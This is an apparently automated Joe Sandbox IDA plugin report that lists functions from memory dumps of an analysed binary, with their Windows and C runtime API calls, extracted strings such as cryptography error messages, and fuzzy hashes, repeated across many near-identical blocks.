Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 78b6f2ae950f60d0ad6665e1c4fe758dc3e8da204e31234d1cf544d0d188f5b0
Instruction ID: 5d8e15d9e9ee410a56ff192a8fbefcab6f6edc0249a8d1be87e74ef760e05ae1
Opcode Fuzzy Hash: 78b6f2ae950f60d0ad6665e1c4fe758dc3e8da204e31234d1cf544d0d188f5b0
Instruction Fuzzy Hash: 07313AB0A016189FCB10CBA9DC84B9DB7BAAF95204F70869AE418E7742C771E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE403DE Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 30f01f81f58d622cd5c57f81d1d37d254159e8a58c20a0afdfeebddcec544ea0
Instruction ID: 936f3d4fe042245ae103eb99654e8cc884ed83f863974ab56af830f2c2002704
Opcode Fuzzy Hash: 30f01f81f58d622cd5c57f81d1d37d254159e8a58c20a0afdfeebddcec544ea0
Instruction Fuzzy Hash: 0A313AB0A016189FCB10CFA9DC84B9DB7BAAF95204F30869AE418E7741CB71E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3FD9F Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: ac0d3787cc14527acad2a55d3694bb6f7f4d0a8e60a0e349341cb3bb122ca1b6
Instruction ID: 71b07866ead81ee09a43307bbeba73b57f0479b4bbb560f6bfd5705f2b59355b
Opcode Fuzzy Hash: ac0d3787cc14527acad2a55d3694bb6f7f4d0a8e60a0e349341cb3bb122ca1b6
Instruction Fuzzy Hash: A53138B0A016189FCB10CBA9DC84B9DB7BAAF99208F30858AE418E7741C771ED81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE49011 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 86b618799773fff9086da9d4fe3351692008ab0e15923f1395fecaec6ea27bd6
Instruction ID: fb77e382503b55f8be88e39c9663dea2066ae2247ae48f3c47e897d48382d699
Opcode Fuzzy Hash: 86b618799773fff9086da9d4fe3351692008ab0e15923f1395fecaec6ea27bd6
Instruction Fuzzy Hash: BA314970E016189FCB10CBA8DC80F9EB7B9AF89218F30869AE419E7741C771E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE9249C Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000100,?,?,?,?,?,6CE925B1,?,00000000,?), ref: 6CE924E6
_malloc.LIBCMT ref: 6CE9251B
_memset.LIBCMT ref: 6CE9253B
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000,00000001,00000000), ref: 6CE92550
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6CE9255E
__freea.LIBCMT ref: 6CE92568

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ByteCharMultiWide$StringType__freea_malloc_memset
String ID:
API String ID: 525495869-0
Opcode ID: 080c09bcdd2e23727fd37339f018c9a9722bd2945b99c5ad3f74b950784e3080
Instruction ID: ae81dc555ca5226a659c685ef29532e60bbc274c26ed936892690555384dab4a
Opcode Fuzzy Hash: 080c09bcdd2e23727fd37339f018c9a9722bd2945b99c5ad3f74b950784e3080
Instruction Fuzzy Hash: 1E318DB160020AAFEF018FA9EC84DAF7BBDEB1835CF21442AF914D6650E734DD549B61

Uniqueness

Uniqueness Score: -1.00%

Function 6CE48A39 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6CE469C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CE46A08
Part of subcall function 6CE469C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE46A15
Part of subcall function 6CE469C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CE46A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 76148e6d8f99ffcfa97d49ffb5be980833686a6cf60fddf67a09228e2ef9a5ca
Instruction ID: 178fe4fc2d30b40f6f9cfb5d21f203dd4ed3e68faf2bf04dc9cea101abd0dd05
Opcode Fuzzy Hash: 76148e6d8f99ffcfa97d49ffb5be980833686a6cf60fddf67a09228e2ef9a5ca
Instruction Fuzzy Hash: 7D312B71E416189FCB10CBA8DC80B9EB7B9AF85218F74869AE419E7641C775E9808F50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3FD3E Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6CE469C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CE46A08
Part of subcall function 6CE469C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE46A15
Part of subcall function 6CE469C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CE46A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 902b1d9ecbfdd9e3224b851dc96acf42f5de18da90fcd991f05acaf43eac08b1
Instruction ID: b9ee9820241e4d42670d30b9318add57199a143d9fc40b1a0e83101927dc819b
Opcode Fuzzy Hash: 902b1d9ecbfdd9e3224b851dc96acf42f5de18da90fcd991f05acaf43eac08b1
Instruction Fuzzy Hash: 153149B1E016189FCB10CBA9DC84B9DB7BAAF95308F70858AE408E7741CB75AD808F50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3FF89 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6CE469C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CE46A08
Part of subcall function 6CE469C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE46A15
Part of subcall function 6CE469C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CE46A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 76148e6d8f99ffcfa97d49ffb5be980833686a6cf60fddf67a09228e2ef9a5ca
Instruction ID: e6552499b3ee36f6943d990732278de1201088c4ed2dc658995c52fea00a73dc
Opcode Fuzzy Hash: 76148e6d8f99ffcfa97d49ffb5be980833686a6cf60fddf67a09228e2ef9a5ca
Instruction Fuzzy Hash: C8312AB1E016189FCB14DBA9DC84B9DB7BAAF95308F30868AE419E7741C775AD80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE806A0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 6CE24760: __CxxThrowException@8.LIBCMT ref: 6CE247F9

_memmove.LIBCMT ref: 6CE80907
_memmove.LIBCMT ref: 6CE80936
_memmove.LIBCMT ref: 6CE80959
__CxxThrowException@8.LIBCMT ref: 6CE80A25

Strings

PSSR_MEM: message recovery disabled, xrefs: 6CE809E3

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _memmove$Exception@8Throw
String ID: PSSR_MEM: message recovery disabled
API String ID: 2655171816-3051149714
Opcode ID: e616343a04d4ce348d4508bb08f11e3795fb48325ab8bb37b5562a2144935cd6
Instruction ID: 7370e0d9679fb77af1a719677e9d1ee4df6102ecd1fb8c57de2a2d116ee382a4
Opcode Fuzzy Hash: e616343a04d4ce348d4508bb08f11e3795fb48325ab8bb37b5562a2144935cd6
Instruction Fuzzy Hash: 6EC16B7560A3819FD714CF28C880B6AB7F5BFC9308F248A5DE58987385DB34E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE8BE8E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6CE8BEB6

Part of subcall function 6CE8AB70: __getptd.LIBCMT ref: 6CE8AB7E
Part of subcall function 6CE8AB70: __getptd.LIBCMT ref: 6CE8AB8C

__getptd.LIBCMT ref: 6CE8BEC0

Part of subcall function 6CE8EAE6: __getptd_noexit.LIBCMT ref: 6CE8EAE9
Part of subcall function 6CE8EAE6: __amsg_exit.LIBCMT ref: 6CE8EAF6

__getptd.LIBCMT ref: 6CE8BECE
__getptd.LIBCMT ref: 6CE8BEDC
__getptd.LIBCMT ref: 6CE8BEE7
_CallCatchBlock2.LIBCMT ref: 6CE8BF0D

Part of subcall function 6CE8AC15: __CallSettingFrame@12.LIBCMT ref: 6CE8AC61

Part of subcall function 6CE8BFB4: __getptd.LIBCMT ref: 6CE8BFC3
Part of subcall function 6CE8BFB4: __getptd.LIBCMT ref: 6CE8BFD1

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: e0abc987a6a51d3ddc1b9450eaed55c80529117d272291f4f91a0129e56fd158
Instruction ID: 747eef86882aa348a3cfe29f754c9439b26953fed19bc6dff08e45ce01a83f60
Opcode Fuzzy Hash: e0abc987a6a51d3ddc1b9450eaed55c80529117d272291f4f91a0129e56fd158
Instruction Fuzzy Hash: C511F975C0160ADFDB10DFA4C944AEEB7B0FF04318F20846AE818A7750DB389A159F50

Uniqueness

Uniqueness Score: -1.00%

Function 07E50F14 Relevance: 9.0, Strings: 7, Instructions: 201COMMON

Download Yara Rule

Strings

p<^q, xrefs: 07E5112C
LOOK, xrefs: 07E51081
p<^q, xrefs: 07E51177
HERE, xrefs: 07E50F6F
Gvq, xrefs: 07E51243
HERE, xrefs: 07E51086
LOOK, xrefs: 07E50F6A

Memory Dump Source

Source File: 00000004.00000002.1921401699.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e50000_4854.jbxd

Similarity

API ID:
String ID: HERE$HERE$LOOK$LOOK$p<^q$p<^q$Gvq
API String ID: 0-792669839
Opcode ID: 495e13e024e6fd62cf92f2f581d1381a1a196644849ffd5f00ae479de8f86c5c
Instruction ID: fd2b64498e577ad99abb1a6a96129ec5f22a7ac4253fd6d0754c648cbd2c9ff7
Opcode Fuzzy Hash: 495e13e024e6fd62cf92f2f581d1381a1a196644849ffd5f00ae479de8f86c5c
Instruction Fuzzy Hash: 5BA170B4E0122D8FDB68DF69C988BD9B7B1AB48314F1491E9D50DAB360DB309E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE570E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 187COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CE57267

Strings

exceeds the maximum of , xrefs: 6CE57309
is less than the minimum of , xrefs: 6CE571D0
: IV length , xrefs: 6CE5719E, 6CE572D7

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw
String ID: exceeds the maximum of $ is less than the minimum of $: IV length
API String ID: 2005118841-1273958906
Opcode ID: e3031123e80a4b5b63761529a662e1b3ce705fcef3ae7da0ecb2a7844e780839
Instruction ID: 7cb40c94bf8488d4f242f4548ac8a043d507d0192b6c5c951fe432cae4d618d0
Opcode Fuzzy Hash: e3031123e80a4b5b63761529a662e1b3ce705fcef3ae7da0ecb2a7844e780839
Instruction Fuzzy Hash: 376183B11083809FD321DB68C884FDBB7F8AF99308F144A1DE59D87741DB75A908CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7AE90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CE7AF27
_strncmp.LIBCMT ref: 6CE7AFA6

Strings

ValueNames, xrefs: 6CE7AEB7
ThisPointer:, xrefs: 6CE7AF4B, 6CE7AFA0

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: 520064084e3c785638f9ece72f369671e199c8a60decdced0a6c44e0a92ce278
Instruction ID: d44074cd5e2287557910e17c3f18f3a92d496be6b03efad3ef912364d1e74497
Opcode Fuzzy Hash: 520064084e3c785638f9ece72f369671e199c8a60decdced0a6c44e0a92ce278
Instruction Fuzzy Hash: CA51F5756087415BC324CF65C991A67B7FAAF8630CF284B1DF4A68BB81C722E809C771

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5A360 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CE5A3F7
_strncmp.LIBCMT ref: 6CE5A476

Strings

ValueNames, xrefs: 6CE5A387
ThisPointer:, xrefs: 6CE5A41B, 6CE5A470

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

